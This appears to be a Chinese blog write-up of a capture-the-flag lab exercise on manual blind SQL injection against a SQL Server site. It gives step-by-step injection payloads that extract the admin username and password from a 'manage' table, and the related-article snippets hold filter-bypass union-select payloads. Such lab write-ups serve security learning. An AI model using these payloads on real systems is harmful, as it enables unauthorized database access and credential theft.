【Web】SQL手工注入Sql Server数据库 (漏洞测试)

最新推荐文章于 2024-06-01 15:00:55 发布
最新推荐文章于 2024-06-01 15:00:55 发布
阅读量3.8k 收藏 7
点赞数 1
分类专栏: CTF CTF 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81283250
版权
CTF 同时被 2 个专栏收录
36 篇文章 3 订阅
订阅专栏
CTF
21 篇文章 5 订阅
订阅专栏

            【Web】SQL手工注入Sql Server数据库 (漏洞测试)

第一步:判断是否有注入,?id=2 and 1=1   正确;id=2 and 1=2  错误,得出有注入点。
第二步:判断数据库类型:?id=2  and  exists (select  *  from  sysobjects) 显示正常, 表示是ms sql server数据库。

第三步:sqlmap,扫一遍,找到数据库、数据表、字段名, 发现dump后出现null值,于是开始手工注入。

第四步:爆出用户名:

地址栏后面加上

?id=2 and unicode(substring((select username from [mozhe_db_v2]..[manage] where id=1),1,1)) between 98 and 128  页面出错

?id=2 and unicode(substring((select username from [mozhe_db_v2]..[manage] where id=1),1,1)) between 97 and 128  页面正常,说明username第一个字符为a,以此类推

第五步:考虑密码

and exists(select id from manage where len(password)=16 and ID=1)   页面正常,说明密码长度为16字符,

然后凑ascii:

?id=2 and exists (select id from manage where unicode(substring(password,1,1))=55 and ID=1)

最后:密码md5解密 一下。

pcy190
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1151
简单的SQL注入
SQL手工注入完全篇
09-08
SQL手工注入是网络安全领域中的一个重要话题,主要涉及的是利用数据库查询语句的漏洞来非法获取或篡改数据库信息。在本完全篇中,我们将深入探讨SQL注入的基本原理、常见手法、防范措施以及如何进行安全编码。 一、...
Web Service漏洞挖掘
yggcwhat
04-08 4531
00×01 什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件, 就可相互交换数据或集成。依据Web Service规范实施的应用之间, 无论它们所使用的语言、 平台或内部协议是什么, 都可以相互交换数
SQL Server注入
最新发布
余十步的博客
06-01 604
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
web service渗透测试
weixin_41489908的博客
10-30 2397
​在街上看见一个人像你,我瞬间特别紧张,渴望是你,又害怕是你,直到看清不是你,我庆幸不是你,有遗憾不是你。。。 ---- 网易云热评 一、什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件,..
SQL过滤字符后手工注入漏洞测试(第2题)——<墨者学院漏洞记录>
chick11的博客
07-16 212
http://219.153.49.228:40519/new_list.php?id=1 http://219.153.49.228:40519/new_list.php?id=1' http://219.153.49.228:40519/new_list.php?id=1'%23 http://219.153.49.228:40519/new_list.php?id=1' and 1=1 经过上面几轮测试,可以看出本题:空格,单引号,等号,union,select,from都过滤。 因此进行替换:
SQL server手工注入学习笔记
愚者
05-07 8535
MSSQL注入(SQL server) 由于这学期正在学数据库,所以理解SQL语句还是可疑的。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。 一:判断是否注入 and 1=1 and 1=2 判断注入的方法是一样的 二:初步判断是否是MSSQL and user>0 三:判断数据库系统 and (select count(*) fro
SQL注入之Access注入手工
12-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL语言的数据库系统,如Access和SQL Server。当一个Web应用程序未能充分验证用户输入的数据,攻击者可以利用这一漏洞,在查询语句的末尾添加恶意的SQL代码,从而在...
SQL注入漏洞挖掘.pptx
10-27
常用的 SQL 注入漏洞测试工具包括: * Appscan * Acunetix * WVSSafe3 WVS * Web Inspect * WebCruiser 五、 手工测试 手工测试可以分为两种:内联式 SQL 注入和终止式 SQL 注入。 内联式 SQL 注入是指攻击者在...
全程图解手工注入SQL注入
06-25
若服务器不允许返回错误,可以通过查询特定的系统表,如Access的`msysobjects`和SQLServer的`sysobjects`来区分。 接下来是【猜表名】,使用`exist(select * from [表名])`查询,如果存在该表,页面将正常显示。...
手工注入基础
11-11
手工注入是一种针对Web应用程序的安全漏洞利用技术,通常发生在应用程序未能充分验证或转义用户输入的情况。这种漏洞允许攻击者通过构造特定的输入来执行数据库查询,获取敏感信息,甚至控制服务器。以下是对手工...
SQL网站注入攻击——明小子工具利用案例
06-20
安全测试工具使用案例,SQL网站注入攻击——明小子工具利用案例
asp.net(C#)防sql注入组件的实现代码
10-29
经常要写一些.net的程序,对于数据库的防注入要求要比较高。这时我从网上搜了一些代码。查看了一下主要是通过HTTPModel来进行对客户端转过来的数据进行处理。
web安全性测试sql注入高级篇
03-30
web安全性测试sql注入高级篇web安全性测试sql注入高级篇web安全性测试sql注入高级篇
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
SQL注入】通过实战教你手工注入MySql数据库
Monsterlz123的博客
05-29 4276
SQL注入】通过实战教你手工注入MySql数据库 Hello,各位小伙伴们大家晚上好~~ 不知不觉,已经是本公众号的第八篇技术文章了,你们都有认真阅读吗? 正当小编发愁下一篇写什么的时候,鲁迅发话了: 好吧,那么我们就一起来学习一下,对PHP+MySql组合的网站,怎么进行纯手工注入吧,Here we go~ 一、准备准备 NPMserv: PHP + Mysql 集成环境,下载后在wi...
web开发中防止SQL注入
diaoding3046的博客
11-21 357
一、SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二、SQL注入攻击的总体思路 1.寻找到SQL注入的位置 2.判断服务器类型和后台数据库类型 3.针对不同的服务器和数据库特点进行SQL注入攻击 三、SQL注入攻击实例 比如在一个登录界面,要求输入用...
sqlserver注入测试
weixin_48776804的博客
07-24 273
sqlserver注入测试
墨者 - SQL过滤字符后手工注入漏洞测试(第2题)
吃肉唐僧的博客
07-11 634
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
sql手工注入漏洞测试(sql server数据库)
06-28
为防止SQL手工输入漏洞,可以采用以下措施进行漏洞测试: 1. 输入特殊字符进行测试,如单引号、注释符号等。 2. 输入超长字符进行测试,如超过字段长度的字符、超过表字段数量的字符等。 3. 输入SQL关键字进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值